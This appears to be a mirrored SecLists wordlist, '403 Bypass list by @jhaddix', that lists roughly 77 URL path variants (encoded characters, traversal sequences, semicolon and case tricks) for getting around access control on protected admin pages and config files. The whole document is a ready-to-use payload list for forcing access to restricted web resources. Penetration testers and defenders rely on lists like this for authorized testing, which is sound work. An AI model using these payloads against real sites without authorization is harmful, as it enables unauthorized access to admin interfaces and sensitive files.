mirror of
https://github.com/danielmiessler/SecLists.git
synced 2025-06-10 02:04:58 +00:00
403 Bypass list by @jhaddix
Url Manipulation Methods
Below are the top 77 ways to bypass access control on incorrectly protected pages. These work best on config files and global dashboards.
url.com/admin/?
url.com//admin//
url.com///admin///
url.com/./admin/./
url.com/admin?
url.com/admin??
url.com/admin??
url.com/admin/?/
url.com/admin/??
url.com/admin/??/
url.com/admin/..
url.com/admin/../
url.com/admin/./
url.com/admin/.
url.com/admin/.//
url.com/admin/*
url.com/admin//*
url.com/admin/%2f
url.com/admin/%2f/
url.com/admin/%20
url.com/admin/%20/
url.com/admin/%09
url.com/admin/%09/
url.com/admin/%0a
url.com/admin/%0a/
url.com/admin/%0d
url.com/admin/%0d/
url.com/admin/%25
url.com/admin/%25/
url.com/admin/%23
url.com/admin/%23/
url.com/admin/%26
url.com/admin/%3f
url.com/admin/%3f/
url.com/admin/%26/
url.com/admin/#
url.com/admin/#/
url.com/admin/#/./
url.com/./admin
url.com/./admin/
url.com/..;/admin
url.com/..;/admin/
url.com/.;/admin
url.com/.;/admin/
url.com/;/admin
url.com/;/admin/
url.com//;//admin
url.com//;//admin/
url.com/admin/./
url.com/%2e/admin
url.com/%2e/admin/
url.com/%20/admin/%20
url.com/%20/admin/%20/
url.com/admin/..;/
url.com/admin.json
url.com/admin/.json
url.com/admin..;/
url.com/admin;/
url.com/admin%00
url.com/admin.css
url.com/admin.html
url.com/admin?id=1
url.com/admin~
url.com/admin/~
url.com/admin/°/
url.com/admin/&
url.com/admin/-
url.com/admin\/\/
url.com/admin/..%3B/
url.com/admin/;%2f..%2f..%2f
url.com/ADMIN
url.com/ADMIN/
url.com/admin/..\;/
url.com/*/admin
url.com/*/admin/
url.com/ADM+IN
url.com/ADM+IN/